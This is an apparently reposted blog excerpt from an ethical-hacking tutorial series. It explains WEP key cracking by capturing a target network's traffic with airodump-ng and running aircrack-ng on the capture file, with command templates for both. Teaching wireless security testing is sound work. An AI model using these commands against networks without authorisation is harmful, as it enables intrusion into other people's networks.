当前位置:首页 > Web开发 > 正文

NETWORK PENETRATION TESTING(8)

11-13 Web开发

WEP Cracking Basic case

Run airdump-ng to log all traffic from the target network.

airodump-ng --channel [channel] --bssid [bssid] --write [file-name][interface]

At the same time, we shall use aircrack-ng to try and crack the key using the capture file created by the above command.

aircrack-ng [file-name]

Keep both programs running at the same time and aircrack-ng will be able to determine the key when the number of IV‘s in the cap file is enough.

Ethical Hacking - NETWORK PENETRATION TESTING(8)

温馨提示: 本文由杰米博客推荐,转载请保留链接: https://www.jmwww.net/file/web/10295.html